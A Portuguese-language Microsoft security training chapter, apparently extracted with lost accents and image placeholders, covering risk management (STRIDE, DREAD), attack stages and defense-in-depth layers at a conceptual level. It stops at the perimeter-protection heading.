Você está na página 1de 62

Conceitos bsicos de segurana

1.1.Pr-requisitos da sesso
Experincia prtica na instalao, configurao, administrao e planejamento da implantao do Windows 2000 Server ou do Windows Server 2003 Experincia com o Active Directory

1.2. Panorama atual 1.3. Os crimes de informtica esto aumentando em freqncia e em gravidade: Nos ltimos meses, houve um ntido aumento nos ataques criminosos contra os sistemas de informaes do mundo todo. A natureza do risco est mudando rapidamente e se tornando cada vez mais sria. Os hackers esto se sofisticando e a proliferao de conexes de banda larga de alta velocidade um fato muito positivo em todos os aspectos cria um ambiente no qual um vrus ou um worm pode se espalhar com muita rapidez e afetar os negcios e os consumidores de forma mais rpida e perceptvel do que antes. 1.4. Existe tecnologia para os sistemas de proteo, mas o segredo est em como coloc-la em prtica: Ainda que no haja software imune a esses ataques criminosos, possvel instalar e manter os computadores de forma a minimizar o risco. Porm, at o momento, tem sido demasiadamente difcil, complicado e desafiante administrar as ferramentas existentes de segurana, muitas das quais, quando implementadas de maneira adequada, so altamente eficazes na preveno ou na atenuao do impacto sobre o computador atacado. 1.5. A Microsoft est buscando soluo para o problema da complexidade, hoje e no futuro: Reconhecemos que a Microsoft pode desempenhar um papel determinante para melhorar a segurana do computador: precisamos continuar investindo e proporcionando um nvel mais alto de segurana, simplificar a segurana e incorporar ainda mais a inteligncia das protees de segurana ao nosso software de forma a reduzir as demandas dos usurios e administradores. Os clientes esperam mais de ns, e estamos atentos e trabalhando de vrias maneiras para inovar e resolver o problema.

Os clientes desejam ferramentas, recursos e configuraes de segurana mais fceis de colocar em prtica e mais simples de usar, e tambm as protees de segurana intrnsecas ao software. Durante este curso, abordaremos como a Microsoft est respondendo a essas demandas e o conjunto de aes que estamos executando, integrando tecnologias de segurana. As aes especficas incluiro: Os processos, as diretivas e as tecnologias aprimoradas da administrao de patches para ajudar os clientes a permanecer atualizados e seguros. O fornecimento de uma melhor orientao e das ferramentas para proteger os sistemas. Atualizaes do Microsoft Windows XP e do Windows Server 2003 com as novas tecnologias de segurana, que tornaro o Windows mais resistente aos ataques, mesmo sem a existncia ou a instalao dos patches. 1.6. Definio de segurana da plataforma H vrios padres, normas e recomendaes disponveis que podem ajudar a simplificar a tarefa de proteger a sua empresa. Analisaremos alguns detalhadamente. Definio da ITIL (IT Infrastructure Library) O gerenciamento da segurana responsvel pela confidencialidade, pela integridade e pela disponibilidade dos dados associados a um servio. O gerenciamento da disponibilidade precisa abordar uma srie de problemas de segurana: Os servios devem estar disponveis exclusivamente para pessoal autorizado. Os dados devem estar disponveis exclusivamente para pessoal autorizado e apenas nos horrios estabelecidos. Os servios devem ser recuperveis de acordo com os parmetros estabelecidos de confidencialidade e integridade. Os servios devem ser desenvolvidos e funcionar de acordo com as diretivas de segurana. Os contratados devem ter acesso ao hardware ou ao software.

Observao: para obter mais informaes, visite o site http://www.itil.org/itil_e/itil_e_080.html ISO 17799 (British Standard 7799) De http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter

As informaes so a alma de todas as organizaes e podem existir de vrias formas. Podem ser impressas ou escritas em papel, armazenadas eletronicamente, transmitidas por email, mostradas em filmes ou faladas em uma conversa. No ambiente de negcios competitivo de hoje, essas informaes esto sob ameaa constante de diversas fontes. Elas podem ser internas, externas, acidentais ou mal-intencionadas. Com o maior uso da nova tecnologia, ao armazenarmos, transmitirmos e recuperarmos as informaes, estamos expostos a tipos e nmeros cada vez maiores de ameaas. necessrio estabelecer uma diretiva abrangente de segurana de informaes em todas as organizaes. preciso garantir a confidencialidade, a integridade e a disponibilidade das informaes corporativas vitais, bem como das informaes do cliente. O padro BS 7799 para sistema de gerenciamento da segurana de informaes (ISMS, Information Security Management System) tornou-se rapidamente um dos mais adotados pelos fornecedores de software do mundo todo. O ISO 17799 (British Standard 7799) oferece uma abordagem sistemtica para o gerenciamento de informaes corporativas confidenciais. Ele apresenta os requisitos para o ISMS. O sistema de gerenciamento da segurana uma norma de prtica que envolve recursos humanos, processos e sistemas. O ISO 17799 composto de 10 sees. Como o ISO 17799 um padro, recomenda-se que cada uma das 10 classificaes de segurana seja analisada em detalhes. Observao: para obter mais informaes, visite: http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf http://csrc.nist.gov/publications/secpubs/otherpubs/reviso-faq.pdf http://emea.bsi-global.com/InformationSecurity/Overview/index.xalter Microsoft Operations Framework

Cap 1-34.jpg O Microsoft Operations Framework (MOF) oferece a orientao tcnica e a ajuda necessrias para que as organizaes obtenham confiabilidade, disponibilidade, capacidade de suporte e flexibilidade em sistemas de misso crtica, com os produtos e tecnologias Microsoft. O MOF proporciona orientao operacional atravs de relatrios de anlise tcnica, guias de operaes, ferramentas, prticas recomendadas, estudos de casos, modelos, ferramentas de suporte e servios. Esses guias se destinam a pessoas, processos, tecnologia e administrao de problemas complexos e ambientes de TI heterogneos e distribudos.

1.7. ndice deste captulo Caso prtico Viso gerencial Disciplina de gerenciamento de riscos de segurana Proteo em camadas Resposta a incidentes de segurana Cenrios de ataque Prticas recomendadas

As dez leis imutveis de segurana

1.8. Caso prtico Neste tpico, abordaremos a segurana do ponto de vista gerencial, de negcios. Especificamente, abordaremos: O impacto das violaes de segurana. A pesquisa do CSI/FBI em 2003.

1.9.Impacto das violaes de segurana


Error: Reference source not found Cap1-01.jpg As violaes de segurana afetam as organizaes de vrias maneiras. Normalmente, elas resultam em: Perda de receita Danos reputao da organizao Perda ou comprometimento de dados Interrupo do processo de negcios Danos confiana do cliente Danos confiana do investidor Conseqncias legais -- Em vrios estados/pases, as conseqncias legais esto associadas falha na segurana do sistema por exemplo, Sarbanes Oxley, HIPAA, GLBA, California SB 1386. As violaes de segurana podem ter efeitos ainda maiores. Quando h uma vulnerabilidade de segurana possvel ou real, a organizao deve agir imediatamente para garantir que essa vulnerabilidade seja removida e que o dano seja limitado. Vrias empresas agora tm servios de atendimento ao cliente por exemplo, sites. Os clientes podem ser as primeiras pessoas a observarem o resultado de um ataque. Por isso, necessrio que o negcio do cliente seja o mais seguro possvel.

1.10.

Pesquisa do CSI/FBI de 2003

Error: Reference source not found Cap1-02.jpg

O custo da implementao de medidas de segurana no insignificante; no entanto, ele representa apenas uma frao do custo associado aos prejuzos causados por incidentes de segurana. o A pesquisa Computer Security Institute/Federal Bureau of Investigation (CSI/FBI) Computer Crime and Security Survey mais recente apresenta resultados interessantes relacionados prejuzos financeiros de empresas que sofrem ataques relacionados ao computador. o A pesquisa mostra que o roubo de informaes e os ataques de negao de servio (DoS) so responsveis pelas maiores perdas. o Como conseqncia, importante notar que apesar do custo da implementao da proteo de segurana no ser trivial, ele representa uma frao do custo associado aos efeitos causados por incidentes de segurana. o A soluo de segurana mais eficaz criar um ambiente em camadas de forma que um ataque a qualquer camada seja isolado. Um ataque teria que comprometer vrias camadas para ser bemsucedido. Esse processo denominado proteo em camadas. Essa estrutura de segurana ser abordada em detalhes mais tarde nesta apresentao.

1.11. Disciplina de gerenciamento de riscos de segurana Neste tpico, abordaremos a disciplina de gerenciamento de riscos de segurana (SRMD, security risk management discipline). Especificamente, abordaremos: Os trs processos da SRMD so: Avaliao. Desenvolvimento e implementao. Operao. A avaliao envolve: Avaliao e apreciao dos ativos. Identificando riscos de segurana com FVRDNE. Analisando e priorizando riscos de segurana com DREUD. Controlando, planejando e agendando atividades relacionadas ao risco da segurana. Desenvolvimento e a implementao envolvem: Desenvolvendo as aes corretivas de segurana. Testando as aes corretivas de segurana. Guardando o conhecimento de segurana. A operao envolve:

Reavaliando bens e riscos de segurana novos e alterados. Estabilizando e implantando medidas defensivas novas ou alteradas.

1.12.

Processos SRMD

Cap1-03.jpg A disciplina de gerenciamento de riscos de segurana (SRMD, security risk management discipline) define os trs processos principais que um negcio precisa implementar para se tornar e permanecer seguro. Os trs processos so: Avaliao esta fase envolve a coleta de informaes relevantes sobre o ambiente da organizao para executar uma avaliao de segurana. Voc precisa coletar dados suficientes para analisar de forma eficaz o estado atual do ambiente. Em seguida, determine se os bens de informao da organizao esto protegidos contra ameaas potenciais. Crie um plano de ao de segurana; esse plano ser executado durante o processo de implementao. Desenvolvimento e implementao esta fase enfatiza a execuo de um plano de ao de segurana para implementar as alteraes recomendadas definidas na avaliao. Alm disso, um plano de contingncia de risco de segurana desenvolvido. Operao durante essa fase, modifique e atualize o ambiente conforme necessrio para mant-lo seguro. Estratgias de teste de invaso e de resposta a incidentes, que ajudam a solidificar os objetivos da implementao de um projeto de segurana na organizao, so

executadas durante os processos operacionais. As atividades de auditoria e de monitoramento tambm so executadas durante os processos operacionais para manter a infra-estrutura intacta e segura. Detalhes adicionais sobre a SRMD podem ser encontrados no guia Microsoft Solutions Guide for Securing Windows 2000 Server (em ingls) em www.microsoft.com.

1.13.

Avaliao: avaliar e quantificar

Error: Reference source not found Cap1-04.jpg Avaliao dos recursos: definido o valor das informaes do ponto de vista dos terceiros envolvidos e do esforo necessrio para recriar as informaes. A avaliao do recursos tambm consiste em determinar o valor de um servio de rede por exemplo, o valor de um servio que fornece aos usurios da rede acesso de Internet de sada do ponto de vista dos terceiros que usam o servio e o quanto custaria recri-lo. Quantficao: indica quanto custa manter o recurso, qual seria o custo se ele fosse perdido ou destrudo e o benefcio que um terceiro teria ao obter essa informao. O valor de um recurso deve refletir todos os custos identificados que poderiam surgir se houvesse algum problema com esse recurso. Para determinar as prioridades dos recursos, tanto valores arbitrrios, conforme mostrado no slide, ou valores especficos, como o custo

monetrio real, podem ser usados. As organizaes devem usar a escala mais apropriada para realar o valor relativo de seus recursos.

1.14.

Avaliao: identificar ameaas de segurana - FVRDNE


Tipos de ameaas Falsificao Violao

Exemplos Falsificar mensagens de email Executar pacotes de autenticao Alterar os dados durante a transmisso Alterar dados em arquivos Excluir um arquivo crtico e negar que excluiu Comprar um produto e mais tarde negar que comprou Expor informaes em mensagens de erro Expor cdigo em sites Inundar uma rede com pacotes SYN (SynFlood) Inundar uma rede com pacotes ICPM forados Explorar saturaes do buffer para obter privilgios do sistema Obter privilgios de administrador de forma ilegtima Cap1-05.jpg

Repudiao Divulgao de informaes Negao de servio

Elevao de privilgios

A identificao do risco de segurana permite que os membros da equipe do projeto debatam e identifiquem riscos de segurana potenciais. Informaes sobre ameaas, vulnerabilidades, exploraes e medidas defensivas so obtidas. O modelo FVRDNE fornece uma estrutura valiosa e fcil de ser lembrada para identificar ameaas e possveis exploraes. Falsificao de identidade a capacidade de obter e usar informaes de autenticao de outro usurio. Um exemplo da falsificao de identidade usar nome e senha de outro usurio. Violao de dados envolve a modificao dos dados. Um exemplo poderia ser violar o contedo de um cookie do cliente. Repudiao a capacidade de negar que algo aconteceu. Um exemplo de repudiao um usurio que carrega dados mal-intencionados e o sistema no consegue rastrear a operao. Divulgao de informaes envolve a exposio de informaes para usurios que no devem t-las. Um exemplo de divulgao de informao

a capacidade de ler arquivos mdicos confidenciais aos quais um usurio mal-intencionado no tm acesso. Os ataques de negao de servio negam servio normal para seus usurios. Um exemplo de negao de servio seria tornar um site indisponvel saturando-o com vrias solicitaes HTTP. Elevao de privilgio o processo que o usurio mal-intencionado usa para executar uma funo a qual no est qualificado para executar. Isso pode ser feito explorando-se uma vulnerabilidade no software ou usando credenciais de forma ilegtima.

Outros ataques que podem ocorrer podem ser executados somente para incorrer um custo no destino. Por exemplo, um ataque pode ser feito em um servio de fax ou em um telefone celular para fazer vrias ligaes internacionais muito caras.

1.15.

Ameaas comuns Quem pode atacar?

1.15.1.

Cap1-28.jpg Os atacantes, com todos os tipos de capacidades e motivaes, so perigosos para a segurana da rede interna, de diversas maneiras: Principiante. A maioria dos atacantes tem apenas conhecimento bsico de sistemas e no possuem mobilidade, mas so perigosos porque normalmente no entendem bem as conseqncias de seus atos. Intermedirio. Os atacantes com habilidades intermedirias geralmente esto tentando ganhar respeito nas comunidades de atacantes. Normalmente, atacam alvos proeminentes e criam ferramentas automatizadas para atacar outras redes.

Avanado. Os atacantes exmios representam um desafio srio para a segurana porque os seus mtodos de ataque podem ir alm da tecnologia em invaso fsica e engenharia social, ou enganar um usurio ou administrador para obter informaes. Embora haja relativamente poucos atacantes avanados, as suas habilidades e experincia fazem com que eles sejam considerados os mais perigosos para uma rede.

1.15.2.

Vulnerabilidades

Cap1-29.jpg Os ataques mais certeiros contra as redes tm xito explorando o campo comum e as vulnerabilidades ou fraquezas j conhecidas. Treine os administradores para reconhecerem essas vulnerabilidades e para que estejam familiarizados com novas vulnerabilidades quando forem descobertas.

1.15.3.

Como ocorrem os ataques?

cap1-30.jpg Os ataques contra as redes normalmente seguem o mesmo padro. Mtodos de projeto para detectar, responder ou evitar ataques durante cada uma destas etapas: 1. Entrada. Nesta etapa, o atacante investiga a organizao-alvo. Ele pode obter todas as informaes pblicas sobre uma organizao e os seus funcionrios e realizar exploraes completas em todos os computadores e dispositivos acessveis pela Internet. 2. Penetrao. Depois que localiza possveis vulnerabilidades, o atacante tenta aproveitar-se de uma delas. Por exemplo, o atacante explora um servidor Web sem a ltima atualizao de segurana.

3. Elevao de privilgio. Logo depois de penetrar com xito na rede, o atacante procura obter os direitos de Administrador do sistema. Por exemplo, enquanto explora o servidor Web, ele obtm o controle de um processo em execuo no contexto LocalSystem. Esse processo ser utilizado para criar uma conta de administrador. Em geral, a segurana deficiente resultante do uso das configuraes padro permite que um atacante obtenha acesso rede com relativa facilidade. 4. Explorar. Depois de obter os direitos necessrios, o atacante pe em execuo o plano para violar a rede. Por exemplo, o atacante opta por adulterar o site pblico da organizao. 5. Cobertura. A etapa final de um ataque onde um atacante procura ocultar suas aes para escapar da deteco ou do processamento. Por exemplo, um atacante apaga entradas relevantes em arquivos de log da interveno.

1.16. DREAD Avaliao: Analisar e priorizar riscos de segurana - DREUD


DREUD Dano Reproduo Explorao Usurios afetados Descoberta Exposio do risco = prioridade do recurso x classificao da ameaa

Exposio ao risco = prioridade do ativo x classificao da ameaa A anlise do risco de segurana usada para avaliar os ataques, as ferramentas, os mtodos e as tcnicas que podem ser usadas para explorar uma vulnerabilidade potencial. A anlise de risco de segurana um mtodo de identificao de riscos e de avaliao do possvel dano que pode ser causado. O resultado da avaliao pode ser usado para justificar protees de segurana. Uma anlise de risco de segurana tem trs metas principais: identificar riscos, quantificar o impacto de ameaas potenciais e fornecer um equilbrio econmico entre o impacto do risco e o custo da medida defensiva. As informaes so obtidas para estimar o nvel do risco de forma que a equipe possa tomar decises educacionais sobre quais riscos de segurana devem receber mais esforo de remediao.

Em seguida, essa anlise usada para priorizar riscos de segurana e permitir que a organizao confirme registros para resolver as questes de segurana mais crticas. Quando uma ameaa identificada, ela precisa ser classificada. Uma abordagem utilizar o DREUD (dano, reproduo, explorao, usurios

afetados e descoberta). Uma classificao de 1 a 10 atribuda em cinco reas: dano, capacidade de reproduo, capacidade de explorao, usurios afetados e descoberta. As classificaes so mdias que fornecem uma classificao geral da ameaa. Quanto maior a classificao, mais sria a ameaa. Essa classificao fornece uma viso da prioridade relativa de cada risco em vez de uma quantificao de risco real. Voc pode usar essa classificao da ameaa e multiplicar pela importncia de um sistema para obter a exposio ao risco do sistema. Elementos a serem protegidos

1.17.

Cap1-31.jpg Alm da proteo fsica especificada na tabela, uma das principais funes da segurana proteger a reputao pblica e a confiana nos parceiros de negcios. Nas prticas geralmente aceitas de contabilidade (GAAP), esse tipo de ativo conhecido como reputao, que pode ser inserido em demonstrativos financeiros quando uma empresa vendida. Considere, por exemplo, que um hacker atacou o site da sua organizao. Voc notifica aos seus clientes que ele roubou informaes particulares de usurios do site, inclusive seus endereos e nmeros de carto de crdito. Alm de incorrer em perdas financeiras diretas do negcio, a sua organizao tambm sofre perda de confiana porque a imagem da empresa ficar manchada.

1.18. Avaliao: controlar, planejar e agendar atividades de risco de segurana

Error: Reference source not found Cap1-06.jpg Controle, o planejamento e o agendamento do risco da segurana usam as informaes obtidas da anlise do risco de segurana para formular as estratgias de atenuao e de contingncia e os planos relacionados. Agendamento do risco de segurana tenta definir uma agenda para as vrias estratgias de correes construdas durante a fase de criao de um projeto de segurana. Esse agendamento leva em considerao a forma como os planos de segurana so aprovados e incorporados na arquitetura de informaes, alm dos procedimentos de operaes dirias padro que precisam ser implementados.

1.19. Desenvolvimento e implementao: desenvolver medidas defensivas de segurana

Error: Reference source not found Cap1-07.jpg O teste das medidas defensivas relacionadas ao risco da segurana ocorre depois do desenvolvimento das estratgias de correes e das alteraes no gerenciamento do sistema associadas e das diretivas e procedimentos para determinar se a sua eficcia foi comprovada. O processo de teste permite que a equipe considere como essas alteraes foram implantadas em um ambiente de produo. Durante o processo de teste, as medidas defensivas so avaliadas para verificar a sua eficcia no controle do risco de segurana e em impactos no desejados em outros aplicativos.

1.20. Desenvolvimento e implementao: documentar o conhecimento relacionado segurana

Cap1-08.jpg A aprendizagem do risco de segurana formaliza o processo de documentao de conhecimento sobre como a equipe protegeu os bens e corrigiu as vulnerabilidades e exploraes descobertas. Quando o departamento de tecnologia da informao (IT) coleta novas informaes sobre segurana, essas informaes devem ser capturadas e implantadas novamente para garantir a eficcia otimizada contnua das medidas defensivas de segurana que protegem os bens da organizao. Alm disso, a educao da segurana precisa ocorrer nas comunidades de negcios. Essa educao pode ter a forma de treinamento ou boletins de segurana. A organizao deve definir um processo de gerenciamento de risco formal que definir como as medidas defensivas sero iniciadas e avaliadas e sob que circunstncias as transies entre as etapas devem ocorrer para riscos de segurana individuais ou grupos de riscos de segurana.

1.21.

Operao: reavaliar ativos e riscos

Error: Reference source not found Cap1-09.jpg

As organizaes so dinmicas e o plano de segurana tambm deve ser. Atualize a sua avaliao de riscos periodicamente. Alm disso, reavalie o plano de avaliao de riscos sempre que fizer alguma alterao significativa na operao ou na estrutura. Portanto, se voc reorganizar, mudar para um outro edifcio, trocar fornecedores, ativar um novo site ou realizar outras alteraes importantes, reavalie os riscos e as possveis perdas usando as etapas descritas anteriormente na fase de Avaliao. importante avaliar riscos continuamente. Isso significa que voc deve continuar procurando a existncia de novos riscos e que esses riscos existentes devem ser reavaliados periodicamente. Se isso no ocorrer, o gerenciamento de riscos no beneficiar a sua organizao. Com que freqncia voc rev o plano de gerenciamento de riscos e os seus disparadores devem ser definidos na diretiva de segurana da organizao. A reavaliao de ativos e de riscos essencialmente o processo do gerenciamento de alteraes, alm de ser tambm o momento em que o gerenciamento da configurao de segurana executado. Isso leva liberao do gerenciamento quando as novas medidas defensivas e diretivas de segurana forem concludas.

1.22. Operao: estabilizar e implantar medidas defensivas


Error: Reference source not found Cap1-10.jpg Geralmente, a SRMD (Security Risk Management Discipline, disciplina de gerenciamento de riscos de segurana) baseada nos seguintes componentes da orientao do ciclo de vida na tecnologia Microsoft: Disciplina de gerenciamento de riscos do Microsoft Solutions Framework (MSF)

http://www.microsoft.com/technet/itsolutions/tandp/innsol/msfrl/msrmd11.asp (em ingls) Modelo de risco para operaes do Microsoft Operations Framework (MOF) http://www.microsoft.com/technet/itsolutions/tandp/opex/mofrl/mofrisk.asp (em ingls) A apresentao de slides sobre o Modelo de risco para operaes do MOF, que descreve as cinco etapas do processo de gerenciamento de riscos: identificar, analisar, planejar, rastrear e controlar. Esse um processo contnuo que envolve avaliao e anlise contnuas dos riscos de segurana. Conseqentemente, haver uma necessidade contnua de

implementar novas medidas defensivas ou alterar medidas defensivas existentes baseadas nessa avaliao. Aps a implementao de novas ou avanadas medidas defensivas, importante manter o processo operacional. As tarefas que devero ser executadas por administradores de segurana ou de rede devem incluir: Administrao do sistema Manuteno de contas Monitoramento de servios Agendamento de trabalhos Procedimentos de backup Esses processos de estabilizao e implantao de medidas defensivas correspondem s fases Estabilizar e Implantar do Modelo de processos do MSF, que pode ser encontrado em http://www.microsoft.com/technet/itsolutions/tandp/innsol/msfrl/msfpm31.as p (em ingls).

1.23.

Proteo em camadas

Neste tpico, abordaremos a proteo em camadas. Especificamente, abordaremos: A estrutura da segurana da organizao proteo em camadas. Como a segurana de cada camada no modelo de proteo em camadas pode ser comprometida. Como fornecer proteo para cada camada no modelo de proteo em camadas. Como proporcionar proteo para cada nvel do modelo de defesa em profundidade. Para reduzir o risco no seu ambiente, voc deve utilizar a estratgia de defesa em profundidade para proteger seus recursos de ameaas internas e externas. A defensa em profundidade (chamada muitas vezes de segurana em profundidade ou segurana de vrias camadas) aproveita um termo militar usado para descrever medidas de defesa de segurana para formar um ambiente coeso de segurana sem um nico ponto de falha. As camadas de segurana que formam a sua estratgia de defesa em profundidade devem incluir medidas protetoras implementadas em todo o caminho desde seus roteadores externos at a localizao de seus recursos e em todos os pontos entre eles. Por mltiplas camadas implementa-se segurana, voc deve ajudar a garantir que se uma das camadas tiver a sua segurana comprometida, as outras proporcionaro a segurana necessria para proteger os seus recursos. Por exemplo, o comprometimento do firewall de uma organizao no deve proporcionar ao atacante acesso aos dados mais confidenciais da organizao. O ideal que cada camada proporcione diversas formas de medidas defensivas para evitar que o mesmo mtodo de ataque seja utilizado nas diferentes camadas.

aconselhvel investir em uma proteo de mltiplos fornecedores contra vrus, sempre que possvel. Tambm importante se certificar de que a proteo de vrus esteja configurada em diversos pontos, como gateway, servidor, clientes etc.

1.24.

Uma estrutura organizacional para segurana


Error: Reference source not found

Cap1-11.jpg Para minimizar a possibilidade de um ataque bem-sucedido contra a sua organizao, voc precisa maximizar as camadas de proteo. Defender a organizao em camadas significa que voc usa vrias camadas de defesa. Se uma camada for comprometida, isso no significa necessariamente que toda a organizao ser comprometida. Como orientao geral, projete e crie cada camada de segurana partindo do princpio de que todas elas foram violadas. Faa algo para proteger a camada na qual est trabalhando. Alm disso, h vrias formas de proteger cada camada individual usando ferramentas, tecnologias, diretivas e prticas recomendadas. Por exemplo: Camada de diretivas, procedimentos e conhecimento programas de educao de segurana para usurios Camada de segurana fsica guardas de segurana, travas e dispositivos de controle Camada do permetro firewalls de hardware e/ou de software e criao de redes virtuais privadas com procedimentos de quarentena Camada de rede interna segmentao de rede, IPSec (IP Security, segurana IP) e sistemas de deteco de invaso da rede Camada de host prticas de fortalecimento do servidor e do cliente, ferramentas de gerenciamento de patch, mtodos de autenticao fortes e sistemas de deteco de intrusos baseados em host

Camada do aplicativo prticas de fortalecimento de aplicativo e software antivrus Camada de dados listas de controle de acesso (ACLs, access control lists) e criptografia

1.25. Descrio da camada de diretivas, dos procedimentos e do conhecimento

Cap1-12.jpg Normalmente, as pessoas no executam suas tarefas dirias pensando na segurana. Uma diretiva de segurana de uma organizao deve definir: Uso aceitvel. Acesso remoto. Proteo das informaes. Backup de dados. Segurana do permetro. Referncias para segurana de dispositivos. Uma diretiva deve usar o consenso e fornecer uma base para aes de recursos humanos (RH) se houver uma violao de segurana. Ela tambm deve ajudar na rea jurdica em casos de violao de segurana.

Uma diretiva de segurana deve fornecer o procedimento de tratamento de incidente apropriado para a organizao. Ela deve definir: reas de responsabilidade. O tipo de informao a ser registrada. Onde a informao deve chegar. As aes a serem tomadas depois de um incidente. Boas diretivas de segurana normalmente so a base de todas as outras prticas de segurana. Cada diretiva deve ser genrica o bastante para ser aplicada entre tecnologias e plataformas. Ao mesmo tempo, ela deve ser especfica o bastante para fornecer orientao aos profissionais de TI sobre como implement-la. O escopo da diretiva de segurana de uma organizao depende do tamanho e da complexidade da organizao. A orientao sobre como criar diretivas de segurana est disponvel em vrias organizaes, como em http://www.sans.org/ e em http://www.iss.net/ (em ingls).

1.26. Comprometimento da camada de diretivas, procedimentos e conhecimento


Os usurios mal-intencionados podem usar tcnicas de engenharia para se aproveitarem de usurios que no tm conhecimento ou que no compreendem questes de segurana no local de trabalho. Muitas regras de segurana parecem ser desnecessrias para os usurios e, por isso, eles no a seguem. Muitos ataques envolvem engenharia social. A engenharia social beneficiase da falta de preocupao com a segurana nas vidas dirias de vrias pessoas. Um usurio mal-intencionado pode gastar muito tempo no trabalho ou durante o seu lazer tentando conhecer os usurios e conquistando sua confiana. Enquanto esse usurio faz perguntas e obtm informaes que isoladamente no parecem ser perigosas, como um todo elas fornecem ao usurio dados sobre como executar ou iniciar um ataque.

1.27. Proteo da camada de diretivas, procedimentos e conhecimento


Para neutralizar essas ameaas de engenharia social, as organizaes devem implementar procedimentos claros e precisos e processos que devem ser usados por todos os funcionrios, alm de treinar funcionrios nessas diretivas. Toda funo executada deve ter instrues claras e documentadas.

O treinamento de segurana sempre necessrio para detalhar esses processos e procedimentos. As instrues devem clarificar toda a estrutura da segurana de forma que os usurios compreendam a necessidade de segurana em todos os nveis e em todos os momentos. Uma diretiva de segurana uma mistura das necessidades de segurana e da cultura da organizao. Ela influenciada pelo tamanho da organizao e suas metas. Algumas diretivas devem ser aplicveis a todos os locais, mas outras so especficas a certos ambientes. Uma diretiva de segurana deve equilibrar o nvel de controle com um nvel de produtividade. Se as diretivas forem muito restritivas, as pessoas encontraro maneiras de burlar os controles. Uma organizao dever ter compromisso gerencial sobre o controle definido em uma diretiva; caso contrrio, ela no ser implementada de forma adequada.

1.28.

Descrio da camada de segurana fsica


Error: Reference source not found Cap1-13.jpg

Um usurio mal-intencionado com acesso a componentes fsicos pode facilmente ignorar muitos procedimentos de segurana. Ele tambm pode usar um telefone da empresa ou um dispositivo de mo. Qualquer ao como ver listas de contato ou nmeros de telefone para enviar uma mensagem de email ou atender o telefone como sendo o proprietrio pode facilitar a meta do usurio mal-intencionado. Computadores laptop da empresa podem conter informaes valiosas teis para um usurio mal-intencionado. Eles sempre devem ser armazenados de forma segura quando no estiverem sendo usados.

1.29.

Comprometimento da camada de segurana fsica


Error: Reference source not found Cap1-14.jpg

Se os usurios mal-intencionados obtiverem acesso fsico a sistemas, eles se tornaro efetivamente os proprietrios desses sistemas. Em alguns casos, o ataque feito somente por vandalismo. A desabilitao de um sistema pode ser um problema maior, mas ela no to sria quanto ter um usurio mal-intencionado que exiba, altere ou exclua dados confidenciais.

O acesso fsico ao sistema tambm permite que um usurio malintencionado instale um software. O software pode no ser notado e pode ser executado em um sistema por um perodo de tempo considervel, obtendo dados de negcios crticos. Isso pode ser desastroso para o negcio.

1.30.

Proteo da camada de segurana fsica

Voc pode usar uma grande variedade de tcnicas para aumentar a segurana em uma instalao. O nvel de segurana fsica disponvel depende do oramento disponvel. fcil manter altos padres quanto estiver lidando com um modelo hipottico. No entanto, no mundo real, as aes precisam ser tomadas independentes do local, do prdio e das medidas de segurana empregadas. A lista no slide apresenta algumas, mas no todas, as formas potenciais de ajudar a proteger suas instalaes. A proteo em camadas comea atravs da aplicao da segurana fsica a todos os componentes da infra-estrutura. Se qualquer indivduo no autorizado tiver acesso fsico ao ambiente, ele no poder ser considerado seguro. Por exemplo, um engenheiro de manuteno pode trocar um nico disco com falha de uma matriz RAID1 que contm dados do cliente. Esse disco pode ser reparado. Agora, os dados esto em mos de terceiros. A primeira etapa consiste em separar servidores de usurios e operadores humanos. Todas as salas de servidor devem ser trancadas. O acesso a essas salas deve ser totalmente controlado e registrado. Alguns mecanismos de controle de acesso que podem ser usados incluem crachs e biometria. O acesso deve ser concedido e autorizado antecipadamente por um membro snior da equipe. Se no houver salas de servidor dedicadas, eles devem ser protegidos em baias ou, em ltimo caso, com travas nos gabinetes. Muitos gabinetes de servidor podem ser abertos usando uma nica chave padro, por isso no confie somente nas travas oferecidas pelos fornecedores. Todas as salas de servidor devem ter algum tipo de mecanismo de supresso de incndio: incndio premeditado uma ameaa que exige uma medida defensiva. O acesso deve ser monitorado por guardas ou circuito fechado de TV (CFTV). As gravaes de vdeo do CFTV podem ser usadas para auditorias e a presena de cmeras pode significar um desencorajamento til contra um oportunista. Lembre-se sempre que a maioria das violaes de segurana so feitas por pessoas "intrometidas" bem-intencionadas e no por hackers mal-intencionados. O acesso fsico estende-se aos consoles de administrao remota tambm. No h nenhuma vantagem em proteger o acesso direto ao teclado e ao monitor se os servidores puderem ser acessados por servios de terminal de qualquer local na rede interna. Essa diretriz aplica-se s solues de

monitor de vdeo e teclado IP (KVM) e ao hardware de gerenciamento remoto tambm. Da mesma forma, limitar as oportunidades que os indivduos, bemintencionados ou no, tm de infectar ou comprometer um sistema importante. Remova os dispositivos de entrada de dados como unidades de disquete e de CD-ROM de sistemas que no precisam deles. Por fim, garanta que todo o hardware da rede esteja protegido fisicamente. Se os servidores estiverem protegidos em uma sala ou baia trancada, os roteadores e comutadores conectados tambm devem estar protegidos fisicamente. Caso contrrio, um intruso pode conectar facilmente um laptop ou um computador de mesa e atacar os servidores de qualquer local do permetro. Novamente, o gerenciamento de dispositivos de rede deve ser controlado; caso contrrio, eles podem ser usados para montar um ataque contra o restante da infra-estrutura.

1.31.

Descrio da camada do permetro

Cap1-15.jpg Um permetro a rea de uma rede que est mais sujeita a ataques externos. Os permetros da rede podem ser conectados a vrios ambientes diferentes, de parceiros de negcios at Internet. Cada organizao usa

critrios diferentes para definir o seu permetro. Os critrios podem incluir algumas ou todas as conexes descritas no slide.

1.32.

Comprometimento da camada do permetro

Cap1-16.jpg Muitos especialistas em segurana podem focar a rea que esperam que um ataque se origine, como a Internet. No entanto, um usurio malintencionado tambm est ciente de que essa a sua soluo mais provvel e tentar atacar a rede a partir de outro local. muito importante que todas as entradas e sadas da sua rede estejam protegidas. pouco provvel que voc seja o responsvel pela implantao da segurana de seus parceiros de negcios; no entanto, voc no pode confiar totalmente em todos os acessos originados a partir deles. Voc tambm no tem controle sob o hardware dos usurios remotos, o que representa outro motivo para no confiar nesse ambiente. As filiais podem no ter informaes to importantes e, portanto, podem ter uma implementao de segurana menos exigente. No entanto, elas podem ter links direto com a matriz da empresa que podem ser usados para um ataque. importante considerar a segurana da rede como um todo e no apenas como reas isoladas.

1.33.

Proteo da camada do permetro

